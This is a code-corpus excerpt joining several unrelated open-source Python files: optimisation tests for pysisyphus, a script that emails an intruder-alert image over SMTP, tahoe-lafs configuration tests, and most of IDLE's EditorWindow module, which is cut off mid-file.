szts_equal = SimpleZTS(get_geoms(), param="equal")
opt = run_cos_opt(szts_equal, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 17)
return opt
def test_equal_szts_straight():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 10
kwargs["max_step"] = 0.04
convergence = {
"rms_force_thresh": 2.4,
}
kwargs["convergence"] = convergence
szts_equal = SimpleZTS(get_geoms(("A", "B")), param="equal")
opt = run_cos_opt(szts_equal, SteepestDescent, **kwargs)
return opt
def test_equal_szts_more_images():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 7
convergence = {
"rms_force_thresh": 2.4,
}
kwargs["convergence"] = convergence
szts_equal = SimpleZTS(get_geoms(), param="equal")
opt = run_cos_opt(szts_equal, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 21)
return opt
def test_energy_szts():
kwargs = copy.copy(KWARGS)
convergence = {
"rms_force_thresh": 2.8,
}
kwargs["convergence"] = convergence
szts_energy = SimpleZTS(get_geoms(), param="energy")
opt = run_cos_opt(szts_energy, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 15)
return opt
def test_energy_szts_more_images():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 10
convergence = {
"rms_force_thresh": 1.7,
}
kwargs["convergence"] = convergence
szts_energy = SimpleZTS(get_geoms(), param="energy")
opt = run_cos_opt(szts_energy, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 22)
return opt
if __name__ == "__main__":
# Steepest Descent
opt = test_steepest_descent_neb()
#opt = test_steepest_descent_straight_neb()
#opt = test_steepest_descent_neb_more_images()
# opt = test_bfgs_straight_neb()
# opt = test_lbfgs_neb()
# FIRE
#opt = test_fire_neb()
# SimpleZTS
#opt = test_equal_szts()
#opt = test_equal_szts_straight()
#opt = test_equal_szts_more_images()
#opt = test_energy_szts()
#opt = test_energy_szts_more_images()
ap = animate(opt)
plt.show()
|
eljost/pysisyphus
|
tests_staging/test_mullerbrownpot.py
|
Python
|
gpl-3.0
| 6,681 | 0.002994 |
# coding=utf-8
# Copyright (C) 2014 Stefano Guglielmetti
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import smtplib, os, sys
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
from email.Utils import COMMASPACE, formatdate
from email import Encoders
#From address, to address, subject and message body
from_address = 'EMAIL_FROM_ADDRESS'
to_address = ['EMAIL_TO_ADDRESS']
email_subject = 'Alert!!! Zombies!!! Ahead!!!'
email_body = 'An intruder has been detected and needs to be eliminated!'
# Credentials (if needed)
username = 'YOUR_EMAIL_USERNAME'
password = 'YOUR_EMAIL_PASSWORD'
# The actual mail send
server = 'smtp.gmail.com:587'
def send_mail(send_from, send_to, subject, text, files=[], server="localhost"):
assert type(send_to)==list
assert type(files)==list
msg = MIMEMultipart()
msg['From'] = send_from
msg['To'] = COMMASPACE.join(send_to)
msg['Date'] = formatdate(localtime=True)
msg['Subject'] = subject
msg.attach( MIMEText(text) )
for f in files:
part = MIMEBase('application', "octet-stream")
part.set_payload( open(f,"rb").read() )
Encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(f))
msg.attach(part)
smtp = smtplib.SMTP(server)
smtp.starttls()
smtp.login(username,password)
smtp.sendmail(send_from, send_to, msg.as_string())
smtp.close()
send_mail(from_address, to_address, email_subject, email_body, [sys.argv[1]], server) #the first command line argument will be used as the image file name
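# Hedged addition (not part of the original script): a small wrapper around the
# call above so the same alert can be sent from other modules with an arbitrary
# list of attachment paths; it reuses the module-level settings unchanged.
def send_alert_with_attachments(attachment_paths):
    send_mail(from_address, to_address, email_subject, email_body,
              list(attachment_paths), server)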
|
amicojeko/YouCantTouchThis
|
sendemail.py
|
Python
|
gpl-3.0
| 2,259 | 0.009296 |
import os.path
from twisted.trial import unittest
from allmydata.util import configutil
from allmydata.test.no_network import GridTestMixin
from ..scripts import create_node
from .. import client
class ConfigUtilTests(GridTestMixin, unittest.TestCase):
def test_config_utils(self):
self.basedir = "cli/ConfigUtilTests/test-config-utils"
self.set_up_grid(oneshare=True)
tahoe_cfg = os.path.join(self.get_clientdir(i=0), "tahoe.cfg")
# test that at least one option was read correctly
config = configutil.get_config(tahoe_cfg)
self.failUnlessEqual(config.get("node", "nickname"), "client-0")
# test that set_config can mutate an existing option
configutil.set_config(config, "node", "nickname", "Alice!")
configutil.write_config(tahoe_cfg, config)
config = configutil.get_config(tahoe_cfg)
self.failUnlessEqual(config.get("node", "nickname"), "Alice!")
# test that set_config can set a new option
descriptor = "Twas brillig, and the slithy toves Did gyre and gimble in the wabe"
configutil.set_config(config, "node", "descriptor", descriptor)
configutil.write_config(tahoe_cfg, config)
config = configutil.get_config(tahoe_cfg)
self.failUnlessEqual(config.get("node", "descriptor"), descriptor)
def test_config_validation_success(self):
d = self.mktemp()
os.mkdir(d)
fname = os.path.join(d, 'tahoe.cfg')
with open(fname, 'w') as f:
f.write('[node]\nvalid = foo\n')
config = configutil.get_config(fname)
# should succeed, no exceptions
configutil.validate_config(fname, config, dict(node=['valid']))
def test_config_validation_invalid_item(self):
d = self.mktemp()
os.mkdir(d)
fname = os.path.join(d, 'tahoe.cfg')
with open(fname, 'w') as f:
f.write('[node]\nvalid = foo\ninvalid = foo\n')
config = configutil.get_config(fname)
e = self.assertRaises(
configutil.UnknownConfigError,
configutil.validate_config,
fname, config, dict(node=['valid']),
)
self.assertIn("section [node] contains unknown option 'invalid'", str(e))
def test_config_validation_invalid_section(self):
d = self.mktemp()
os.mkdir(d)
fname = os.path.join(d, 'tahoe.cfg')
with open(fname, 'w') as f:
f.write('[node]\nvalid = foo\n[invalid]\n')
config = configutil.get_config(fname)
e = self.assertRaises(
configutil.UnknownConfigError,
configutil.validate_config,
fname, config, dict(node=['valid']),
)
self.assertIn("contains unknown section [invalid]", str(e))
def test_create_client_config(self):
d = self.mktemp()
os.mkdir(d)
fname = os.path.join(d, 'tahoe.cfg')
with open(fname, 'w') as f:
opts = {"nickname": "nick",
"webport": "tcp:3456",
"hide-ip": False,
"listen": "none",
}
create_node.write_node_config(f, opts)
create_node.write_client_config(f, opts)
config = configutil.get_config(fname)
# should succeed, no exceptions
configutil.validate_config(fname, config,
client._valid_config_sections())
|
david415/tahoe-lafs
|
src/allmydata/test/test_configutil.py
|
Python
|
gpl-2.0
| 3,451 | 0.00058 |
import sys
import os
import re
import imp
from Tkinter import *
import tkSimpleDialog
import tkMessageBox
import webbrowser
from idlelib.MultiCall import MultiCallCreator
from idlelib import idlever
from idlelib import WindowList
from idlelib import SearchDialog
from idlelib import GrepDialog
from idlelib import ReplaceDialog
from idlelib import PyParse
from idlelib.configHandler import idleConf
from idlelib import aboutDialog, textView, configDialog
from idlelib import macosxSupport
# The default tab setting for a Text widget, in average-width characters.
TK_TABWIDTH_DEFAULT = 8
def _sphinx_version():
"Format sys.version_info to produce the Sphinx version string used to install the chm docs"
major, minor, micro, level, serial = sys.version_info
release = '%s%s' % (major, minor)
if micro:
release += '%s' % (micro,)
if level == 'candidate':
release += 'rc%s' % (serial,)
elif level != 'final':
release += '%s%s' % (level[0], serial)
return release
def _find_module(fullname, path=None):
"""Version of imp.find_module() that handles hierarchical module names"""
file = None
for tgt in fullname.split('.'):
if file is not None:
file.close() # close intermediate files
(file, filename, descr) = imp.find_module(tgt, path)
if descr[2] == imp.PY_SOURCE:
break # find but not load the source file
module = imp.load_module(tgt, file, filename, descr)
try:
path = module.__path__
except AttributeError:
raise ImportError, 'No source for module ' + module.__name__
if descr[2] != imp.PY_SOURCE:
        # If all of the above failed without raising an exception, fall back
# to a straight import which can find __init__.py in a package.
m = __import__(fullname)
try:
filename = m.__file__
except AttributeError:
pass
else:
file = None
base, ext = os.path.splitext(filename)
if ext == '.pyc':
ext = '.py'
filename = base + ext
descr = filename, None, imp.PY_SOURCE
return file, filename, descr
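# Hedged illustration (not part of the original module): how _find_module() is
# consumed by EditorWindow.open_module() further down -- locate the source for a
# dotted name, close the intermediate file handle, and keep the filename.
# 'idlelib.PyParse' is only an example of a dotted module name.
def _example_locate_source(name='idlelib.PyParse'):
    f, filename, descr = _find_module(name)
    if f:
        f.close()
    if descr[2] != imp.PY_SOURCE:
        raise ImportError('%s is not a source module' % name)
    return filename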
class HelpDialog(object):
def __init__(self):
self.parent = None # parent of help window
        self.dlg = None         # the help window itself
def display(self, parent, near=None):
""" Display the help dialog.
parent - parent widget for the help window
near - a Toplevel widget (e.g. EditorWindow or PyShell)
to use as a reference for placing the help window
"""
if self.dlg is None:
self.show_dialog(parent)
if near:
self.nearwindow(near)
def show_dialog(self, parent):
self.parent = parent
fn=os.path.join(os.path.abspath(os.path.dirname(__file__)),'help.txt')
self.dlg = dlg = textView.view_file(parent,'Help',fn, modal=False)
dlg.bind('<Destroy>', self.destroy, '+')
def nearwindow(self, near):
# Place the help dialog near the window specified by parent.
# Note - this may not reposition the window in Metacity
# if "/apps/metacity/general/disable_workarounds" is enabled
dlg = self.dlg
geom = (near.winfo_rootx() + 10, near.winfo_rooty() + 10)
dlg.withdraw()
dlg.geometry("=+%d+%d" % geom)
dlg.deiconify()
dlg.lift()
def destroy(self, ev=None):
self.dlg = None
self.parent = None
helpDialog = HelpDialog() # singleton instance
class EditorWindow(object):
from idlelib.Percolator import Percolator
from idlelib.ColorDelegator import ColorDelegator
from idlelib.UndoDelegator import UndoDelegator
from idlelib.IOBinding import IOBinding, filesystemencoding, encoding
from idlelib import Bindings
from Tkinter import Toplevel
from idlelib.MultiStatusBar import MultiStatusBar
help_url = None
def __init__(self, flist=None, filename=None, key=None, root=None):
if EditorWindow.help_url is None:
dochome = os.path.join(sys.prefix, 'Doc', 'index.html')
if sys.platform.count('linux'):
# look for html docs in a couple of standard places
pyver = 'python-docs-' + '%s.%s.%s' % sys.version_info[:3]
if os.path.isdir('/var/www/html/python/'): # "python2" rpm
dochome = '/var/www/html/python/index.html'
else:
basepath = '/usr/share/doc/' # standard location
dochome = os.path.join(basepath, pyver,
'Doc', 'index.html')
elif sys.platform[:3] == 'win':
chmfile = os.path.join(sys.prefix, 'Doc',
'Python%s.chm' % _sphinx_version())
if os.path.isfile(chmfile):
dochome = chmfile
elif macosxSupport.runningAsOSXApp():
# documentation is stored inside the python framework
dochome = os.path.join(sys.prefix,
'Resources/English.lproj/Documentation/index.html')
dochome = os.path.normpath(dochome)
if os.path.isfile(dochome):
EditorWindow.help_url = dochome
if sys.platform == 'darwin':
# Safari requires real file:-URLs
EditorWindow.help_url = 'file://' + EditorWindow.help_url
else:
EditorWindow.help_url = "http://docs.python.org/%d.%d" % sys.version_info[:2]
currentTheme=idleConf.CurrentTheme()
self.flist = flist
root = root or flist.root
self.root = root
try:
sys.ps1
except AttributeError:
sys.ps1 = '>>> '
self.menubar = Menu(root)
self.top = top = WindowList.ListedToplevel(root, menu=self.menubar)
if flist:
self.tkinter_vars = flist.vars
#self.top.instance_dict makes flist.inversedict available to
#configDialog.py so it can access all EditorWindow instances
self.top.instance_dict = flist.inversedict
else:
self.tkinter_vars = {} # keys: Tkinter event names
# values: Tkinter variable instances
self.top.instance_dict = {}
self.recent_files_path = os.path.join(idleConf.GetUserCfgDir(),
'recent-files.lst')
self.text_frame = text_frame = Frame(top)
self.vbar = vbar = Scrollbar(text_frame, name='vbar')
self.width = idleConf.GetOption('main','EditorWindow','width', type='int')
text_options = {
'name': 'text',
'padx': 5,
'wrap': 'none',
'width': self.width,
'height': idleConf.GetOption('main', 'EditorWindow', 'height', type='int')}
if TkVersion >= 8.5:
# Starting with tk 8.5 we have to set the new tabstyle option
# to 'wordprocessor' to achieve the same display of tabs as in
# older tk versions.
text_options['tabstyle'] = 'wordprocessor'
self.text = text = MultiCallCreator(Text)(text_frame, **text_options)
self.top.focused_widget = self.text
self.createmenubar()
self.apply_bindings()
self.top.protocol("WM_DELETE_WINDOW", self.close)
self.top.bind("<<close-window>>", self.close_event)
if macosxSupport.runningAsOSXApp():
# Command-W on editorwindows doesn't work without this.
text.bind('<<close-window>>', self.close_event)
# Some OS X systems have only one mouse button,
# so use control-click for pulldown menus there.
# (Note, AquaTk defines <2> as the right button if
# present and the Tk Text widget already binds <2>.)
text.bind("<Control-Button-1>",self.right_menu_event)
else:
# Elsewhere, use right-click for pulldown menus.
text.bind("<3>",self.right_menu_event)
text.bind("<<cut>>", self.cut)
text.bind("<<copy>>", self.copy)
text.bind("<<paste>>", self.paste)
text.bind("<<center-insert>>", self.center_insert_event)
text.bind("<<help>>", self.help_dialog)
text.bind("<<python-docs>>", self.python_docs)
text.bind("<<about-idle>>", self.about_dialog)
text.bind("<<open-config-dialog>>", self.config_dialog)
text.bind("<<open-module>>", self.open_module)
text.bind("<<do-nothing>>", lambda event: "break")
text.bind("<<select-all>>", self.select_all)
text.bind("<<remove-selection>>", self.remove_selection)
text.bind("<<find>>", self.find_event)
text.bind("<<find-again>>", self.find_again_event)
text.bind("<<find-in-files>>", self.find_in_files_event)
text.bind("<<find-selection>>", self.find_selection_event)
text.bind("<<replace>>", self.replace_event)
text.bind("<<goto-line>>", self.goto_line_event)
text.bind("<<smart-backspace>>",self.smart_backspace_event)
text.bind("<<newline-and-indent>>",self.newline_and_indent_event)
text.bind("<<smart-indent>>",self.smart_indent_event)
text.bind("<<indent-region>>",self.indent_region_event)
text.bind("<<dedent-region>>",self.dedent_region_event)
text.bind("<<comment-region>>",self.comment_region_event)
text.bind("<<uncomment-region>>",self.uncomment_region_event)
text.bind("<<tabify-region>>",self.tabify_region_event)
text.bind("<<untabify-region>>",self.untabify_region_event)
text.bind("<<toggle-tabs>>",self.toggle_tabs_event)
text.bind("<<change-indentwidth>>",self.change_indentwidth_event)
text.bind("<Left>", self.move_at_edge_if_selection(0))
text.bind("<Right>", self.move_at_edge_if_selection(1))
text.bind("<<del-word-left>>", self.del_word_left)
text.bind("<<del-word-right>>", self.del_word_right)
text.bind("<<beginning-of-line>>", self.home_callback)
if flist:
flist.inversedict[self] = key
if key:
flist.dict[key] = self
text.bind("<<open-new-window>>", self.new_callback)
text.bind("<<close-all-windows>>", self.flist.close_all_callback)
text.bind("<<open-class-browser>>", self.open_class_browser)
text.bind("<<open-path-browser>>", self.open_path_browser)
self.set_status_bar()
vbar['command'] = text.yview
vbar.pack(side=RIGHT, fill=Y)
text['yscrollcommand'] = vbar.set
fontWeight = 'normal'
if idleConf.GetOption('main', 'EditorWindow', 'font-bold', type='bool'):
fontWeight='bold'
text.config(font=(idleConf.GetOption('main', 'EditorWindow', 'font'),
idleConf.GetOption('main', 'EditorWindow',
'font-size', type='int'),
fontWeight))
text_frame.pack(side=LEFT, fill=BOTH, expand=1)
text.pack(side=TOP, fill=BOTH, expand=1)
text.focus_set()
# usetabs true -> literal tab characters are used by indent and
# dedent cmds, possibly mixed with spaces if
# indentwidth is not a multiple of tabwidth,
# which will cause Tabnanny to nag!
# false -> tab characters are converted to spaces by indent
# and dedent cmds, and ditto TAB keystrokes
# Although use-spaces=0 can be configured manually in config-main.def,
# configuration of tabs v. spaces is not supported in the configuration
# dialog. IDLE promotes the preferred Python indentation: use spaces!
usespaces = idleConf.GetOption('main', 'Indent', 'use-spaces', type='bool')
self.usetabs = not usespaces
# tabwidth is the display width of a literal tab character.
# CAUTION: telling Tk to use anything other than its default
# tab setting causes it to use an entirely different tabbing algorithm,
# treating tab stops as fixed distances from the left margin.
# Nobody expects this, so for now tabwidth should never be changed.
self.tabwidth = 8 # must remain 8 until Tk is fixed.
# indentwidth is the number of screen characters per indent level.
# The recommended Python indentation is four spaces.
self.indentwidth = self.tabwidth
self.set_notabs_indentwidth()
# If context_use_ps1 is true, parsing searches back for a ps1 line;
# else searches for a popular (if, def, ...) Python stmt.
self.context_use_ps1 = False
# When searching backwards for a reliable place to begin parsing,
# first start num_context_lines[0] lines back, then
# num_context_lines[1] lines back if that didn't work, and so on.
# The last value should be huge (larger than the # of lines in a
# conceivable file).
# Making the initial values larger slows things down more often.
self.num_context_lines = 50, 500, 5000000
self.per = per = self.Percolator(text)
self.undo = undo = self.UndoDelegator()
per.insertfilter(undo)
text.undo_block_start = undo.undo_block_start
text.undo_block_stop = undo.undo_block_stop
undo.set_saved_change_hook(self.saved_change_hook)
# IOBinding implements file I/O and printing functionality
self.io = io = self.IOBinding(self)
io.set_filename_change_hook(self.filename_change_hook)
# Create the recent files submenu
self.recent_files_menu = Menu(self.menubar)
self.menudict['file'].insert_cascade(3, label='Recent Files',
underline=0,
menu=self.recent_files_menu)
self.update_recent_files_list()
self.color = None # initialized below in self.ResetColorizer
if filename:
if os.path.exists(filename) and not os.path.isdir(filename):
io.loadfile(filename)
else:
io.set_filename(filename)
self.ResetColorizer()
self.saved_change_hook()
self.set_indentation_params(self.ispythonsource(filename))
self.load_extensions()
menu = self.menudict.get('windows')
if menu:
end = menu.index("end")
if end is None:
end = -1
if end >= 0:
menu.add_separator()
end = end + 1
self.wmenu_end = end
WindowList.register_callback(self.postwindowsmenu)
# Some abstractions so IDLE extensions are cross-IDE
self.askyesno = tkMessageBox.askyesno
self.askinteger = tkSimpleDialog.askinteger
self.showerror = tkMessageBox.showerror
self._highlight_workaround() # Fix selection tags on Windows
def _highlight_workaround(self):
# On Windows, Tk removes painting of the selection
# tags which is different behavior than on Linux and Mac.
# See issue14146 for more information.
if not sys.platform.startswith('win'):
return
text = self.text
text.event_add("<<Highlight-FocusOut>>", "<FocusOut>")
text.event_add("<<Highlight-FocusIn>>", "<FocusIn>")
def highlight_fix(focus):
sel_range = text.tag_ranges("sel")
if sel_range:
if focus == 'out':
HILITE_CONFIG = idleConf.GetHighlight(
idleConf.CurrentTheme(), 'hilite')
text.tag_config("sel_fix", HILITE_CONFIG)
text.tag_raise("sel_fix")
text.tag_add("sel_fix", *sel_range)
elif focus == 'in':
text.tag_remove("sel_fix", "1.0", "end")
text.bind("<<Highlight-FocusOut>>",
lambda ev: highlight_fix("out"))
text.bind("<<Highlight-FocusIn>>",
lambda ev: highlight_fix("in"))
def _filename_to_unicode(self, filename):
"""convert filename to unicode in order to display it in Tk"""
if isinstance(filename, unicode) or not filename:
return filename
else:
try:
return filename.decode(self.filesystemencoding)
except UnicodeDecodeError:
# XXX
try:
return filename.decode(self.encoding)
except UnicodeDecodeError:
# byte-to-byte conversion
return filename.decode('iso8859-1')
def new_callback(self, event):
dirname, basename = self.io.defaultfilename()
self.flist.new(dirname)
return "break"
def home_callback(self, event):
if (event.state & 4) != 0 and event.keysym == "Home":
# state&4==Control. If <Control-Home>, use the Tk binding.
return
if self.text.index("iomark") and \
self.text.compare("iomark", "<=", "insert lineend") and \
self.text.compare("insert linestart", "<=", "iomark"):
# In Shell on input line, go to just after prompt
insertpt = int(self.text.index("iomark").split(".")[1])
else:
line = self.text.get("insert linestart", "insert lineend")
for insertpt in xrange(len(line)):
if line[insertpt] not in (' ','\t'):
break
else:
insertpt=len(line)
lineat = int(self.text.index("insert").split('.')[1])
if insertpt == lineat:
insertpt = 0
dest = "insert linestart+"+str(insertpt)+"c"
if (event.state&1) == 0:
# shift was not pressed
self.text.tag_remove("sel", "1.0", "end")
else:
if not self.text.index("sel.first"):
self.text.mark_set("my_anchor", "insert") # there was no previous selection
else:
if self.text.compare(self.text.index("sel.first"), "<", self.text.index("insert")):
self.text.mark_set("my_anchor", "sel.first") # extend back
else:
self.text.mark_set("my_anchor", "sel.last") # extend forward
first = self.text.index(dest)
last = self.text.index("my_anchor")
if self.text.compare(first,">",last):
first,last = last,first
self.text.tag_remove("sel", "1.0", "end")
self.text.tag_add("sel", first, last)
self.text.mark_set("insert", dest)
self.text.see("insert")
return "break"
def set_status_bar(self):
self.status_bar = self.MultiStatusBar(self.top)
if macosxSupport.runningAsOSXApp():
# Insert some padding to avoid obscuring some of the statusbar
# by the resize widget.
self.status_bar.set_label('_padding1', ' ', side=RIGHT)
self.status_bar.set_label('column', 'Col: ?', side=RIGHT)
self.status_bar.set_label('line', 'Ln: ?', side=RIGHT)
self.status_bar.pack(side=BOTTOM, fill=X)
self.text.bind("<<set-line-and-column>>", self.set_line_and_column)
self.text.event_add("<<set-line-and-column>>",
"<KeyRelease>", "<ButtonRelease>")
self.text.after_idle(self.set_line_and_column)
def set_line_and_column(self, event=None):
line, column = self.text.index(INSERT).split('.')
self.status_bar.set_label('column', 'Col: %s' % column)
self.status_bar.set_label('line', 'Ln: %s' % line)
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("format", "F_ormat"),
("run", "_Run"),
("options", "_Options"),
("windows", "_Windows"),
("help", "_Help"),
]
if macosxSupport.runningAsOSXApp():
menu_specs[-2] = ("windows", "_Window")
def createmenubar(self):
mbar = self.menubar
self.menudict = menudict = {}
for name, label in self.menu_specs:
underline, label = prepstr(label)
menudict[name] = menu = Menu(mbar, name=name)
mbar.add_cascade(label=label, menu=menu, underline=underline)
if macosxSupport.isCarbonAquaTk(self.root):
# Insert the application menu
menudict['application'] = menu = Menu(mbar, name='apple')
mbar.add_cascade(label='IDLE', menu=menu)
self.fill_menus()
self.base_helpmenu_length = self.menudict['help'].index(END)
self.reset_help_menu_entries()
def postwindowsmenu(self):
# Only called when Windows menu exists
menu = self.menudict['windows']
end = menu.index("end")
if end is None:
end = -1
if end > self.wmenu_end:
menu.delete(self.wmenu_end+1, end)
WindowList.add_windows_to_menu(menu)
rmenu = None
def right_menu_event(self, event):
self.text.mark_set("insert", "@%d,%d" % (event.x, event.y))
if not self.rmenu:
self.make_rmenu()
rmenu = self.rmenu
self.event = event
iswin = sys.platform[:3] == 'win'
if iswin:
self.text.config(cursor="arrow")
for item in self.rmenu_specs:
try:
label, eventname, verify_state = item
except ValueError: # see issue1207589
continue
if verify_state is None:
continue
state = getattr(self, verify_state)()
rmenu.entryconfigure(label, state=state)
rmenu.tk_popup(event.x_root, event.y_root)
if iswin:
self.text.config(cursor="ibeam")
rmenu_specs = [
# ("Label", "<<virtual-event>>", "statefuncname"), ...
("Close", "<<close-window>>", None), # Example
]
def make_rmenu(self):
rmenu = Menu(self.text, tearoff=0)
for item in self.rmenu_specs:
label, eventname = item[0], item[1]
if label is not None:
def command(text=self.text, eventname=eventname):
text.event_generate(eventname)
rmenu.add_command(label=label, command=command)
else:
rmenu.add_separator()
self.rmenu = rmenu
def rmenu_check_cut(self):
return self.rmenu_check_copy()
def rmenu_check_copy(self):
try:
indx = self.text.index('sel.first')
except TclError:
return 'disabled'
else:
return 'normal' if indx else 'disabled'
def rmenu_check_paste(self):
try:
self.text.tk.call('tk::GetSelection', self.text, 'CLIPBOARD')
except TclError:
return 'disabled'
else:
return 'normal'
def about_dialog(self, event=None):
aboutDialog.AboutDialog(self.top,'About IDLE')
def config_dialog(self, event=None):
configDialog.ConfigDialog(self.top,'Settings')
def help_dialog(self, event=None):
if self.root:
parent = self.root
else:
parent = self.top
helpDialog.display(parent, near=self.top)
def python_docs(self, event=None):
if sys.platform[:3] == 'win':
try:
os.startfile(self.help_url)
except WindowsError as why:
tkMessageBox.showerror(title='Document Start Failure',
message=str(why), parent=self.text)
else:
webbrowser.open(self.help_url)
return "break"
def cut(self,event):
self.text.event_generate("<<Cut>>")
return "break"
def copy(self,event):
if not self.text.tag_ranges("sel"):
# There is no selection, so do nothing and maybe interrupt.
return
self.text.event_generate("<<Copy>>")
return "break"
def paste(self,event):
self.text.event_generate("<<Paste>>")
self.text.see("insert")
return "break"
def select_all(self, event=None):
self.text.tag_add("sel", "1.0", "end-1c")
self.text.mark_set("insert", "1.0")
self.text.see("insert")
return "break"
def remove_selection(self, event=None):
self.text.tag_remove("sel", "1.0", "end")
self.text.see("insert")
def move_at_edge_if_selection(self, edge_index):
"""Cursor move begins at start or end of selection
When a left/right cursor key is pressed create and return to Tkinter a
function which causes a cursor move from the associated edge of the
selection.
"""
self_text_index = self.text.index
self_text_mark_set = self.text.mark_set
edges_table = ("sel.first+1c", "sel.last-1c")
def move_at_edge(event):
if (event.state & 5) == 0: # no shift(==1) or control(==4) pressed
try:
self_text_index("sel.first")
self_text_mark_set("insert", edges_table[edge_index])
except TclError:
pass
return move_at_edge
def del_word_left(self, event):
self.text.event_generate('<Meta-Delete>')
return "break"
def del_word_right(self, event):
self.text.event_generate('<Meta-d>')
return "break"
def find_event(self, event):
SearchDialog.find(self.text)
return "break"
def find_again_event(self, event):
SearchDialog.find_again(self.text)
return "break"
def find_selection_event(self, event):
SearchDialog.find_selection(self.text)
return "break"
def find_in_files_event(self, event):
GrepDialog.grep(self.text, self.io, self.flist)
return "break"
def replace_event(self, event):
ReplaceDialog.replace(self.text)
return "break"
def goto_line_event(self, event):
text = self.text
lineno = tkSimpleDialog.askinteger("Goto",
"Go to line number:",parent=text)
if lineno is None:
return "break"
if lineno <= 0:
text.bell()
return "break"
text.mark_set("insert", "%d.0" % lineno)
text.see("insert")
def open_module(self, event=None):
# XXX Shouldn't this be in IOBinding or in FileList?
try:
name = self.text.get("sel.first", "sel.last")
except TclError:
name = ""
else:
name = name.strip()
name = tkSimpleDialog.askstring("Module",
"Enter the name of a Python module\n"
"to search on sys.path and open:",
parent=self.text, initialvalue=name)
if name:
name = name.strip()
if not name:
return
# XXX Ought to insert current file's directory in front of path
try:
(f, file, (suffix, mode, type)) = _find_module(name)
except (NameError, ImportError) as msg:
tkMessageBox.showerror("Import error", str(msg), parent=self.text)
return
if type != imp.PY_SOURCE:
tkMessageBox.showerror("Unsupported type",
"%s is not a source module" % name, parent=self.text)
return
if f:
f.close()
if self.flist:
self.flist.open(file)
else:
self.io.loadfile(file)
def open_class_browser(self, event=None):
filename = self.io.filename
if not filename:
tkMessageBox.showerror(
"No filename",
"This buffer has no associated filename",
master=self.text)
self.text.focus_set()
return None
head, tail = os.path.split(filename)
base, ext = os.path.splitext(tail)
from idlelib import ClassBrowser
ClassBrowser.ClassBrowser(self.flist, base, [head])
def open_path_browser(self, event=None):
from idlelib import PathBrowser
PathBrowser.PathBrowser(self.flist)
def gotoline(self, lineno):
if lineno is not None and lineno > 0:
self.text.mark_set("insert", "%d.0" % lineno)
self.text.tag_remove("sel", "1.0", "end")
self.text.tag_add("sel", "insert", "insert +1l")
self.center()
def ispythonsource(self, filename):
if not filename or os.path.isdir(filename):
return True
base, ext = os.path.splitext(os.path.basename(filename))
if os.path.normcase(ext) in (".py", ".pyw"):
return True
try:
f = open(filename)
line = f.readline()
f.close()
except IOError:
return False
return line.startswith('#!') and line.find('python') >= 0
def close_hook(self):
if self.flist:
self.flist.unregister_maybe_terminate(self)
self.flist = None
def set_close_hook(self, close_hook):
self.close_hook = close_hook
def filename_change_hook(self):
if self.flist:
self.flist.filename_changed_edit(self)
self.saved_change_hook()
self.top.update_windowlist_registry(self)
self.ResetColorizer()
def _addcolorizer(self):
if self.color:
return
if self.ispythonsource(self.io.filename):
self.color = self.ColorDelegator()
# can add more colorizers here...
if self.color:
self.per.removefilter(self.undo)
self.per.insertfilter(self.color)
self.per.insertfilter(self.undo)
def _rmcolorizer(self):
if not self.color:
return
self.color.removecolors()
self.per.removefilter(self.color)
self.color = None
def ResetColorizer(self):
"Update the colour theme"
# Called from self.filename_change_hook and from configDialog.py
self._rmcolorizer()
self._addcolorizer()
theme = idleConf.GetOption('main','Theme','name')
normal_colors = idleConf.GetHighlight(theme, 'normal')
cursor_color = idleConf.GetHighlight(theme, 'cursor', fgBg='fg')
select_colors = idleConf.GetHighlight(theme, 'hilite')
self.text.config(
foreground=normal_colors['foreground'],
background=normal_colors['background'],
insertbackground=cursor_color,
selectforeground=select_colors['foreground'],
selectbackground=select_colors['background'],
)
def ResetFont(self):
"Update the text widgets' font if it is changed"
# Called from configDialog.py
fontWeight='normal'
if idleConf.GetOption('main','EditorWindow','font-bold',type='bool'):
fontWeight='bold'
self.text.config(font=(idleConf.GetOption('main','EditorWindow','font'),
idleConf.GetOption('main','EditorWindow','font-size',
type='int'),
fontWeight))
def RemoveKeybindings(self):
"Remove the keybindings before they are changed."
# Called from configDialog.py
self.Bindings.default_keydefs = keydefs = idleConf.GetCurrentKeySet()
for event, keylist in keydefs.items():
self.text.event_delete(event, *keylist)
for extensionName in self.get_standard_extension_names():
xkeydefs = idleConf.GetExtensionBindings(extensionName)
if xkeydefs:
for event, keylist in xkeydefs.items():
self.text.event_delete(event, *keylist)
def ApplyKeybindings(self):
"Update the keybindings after they are changed"
# Called from configDialog.py
self.Bindings.default_keydefs = keydefs = idleConf.GetCurrentKeySet()
self.apply_bindings()
for extensionName in self.get_standard_extension_names():
xkeydefs = idleConf.GetExtensionBindings(extensionName)
if xkeydefs:
self.apply_bindings(xkeydefs)
#update menu accelerators
menuEventDict = {}
for menu in self.Bindings.menudefs:
menuEventDict[menu[0]] = {}
for item in menu[1]:
if item:
menuEventDict[menu[0]][prepstr(item[0])[1]] = item[1]
for menubarItem in self.menudict.keys():
menu = self.menudict[menubarItem]
end = menu.index(END)
if end is None:
# Skip empty menus
continue
end += 1
for index in range(0, end):
if menu.type(index) == 'command':
accel = menu.entrycget(index, 'accelerator')
if accel:
itemName = menu.entrycget(index, 'label')
event = ''
if menubarItem in menuEventDict:
if itemName in menuEventDict[menubarItem]:
event = menuEventDict[menubarItem][itemName]
if event:
accel = get_accelerator(keydefs, event)
menu.entryconfig(index, accelerator=accel)
def set_notabs_indentwidth(self):
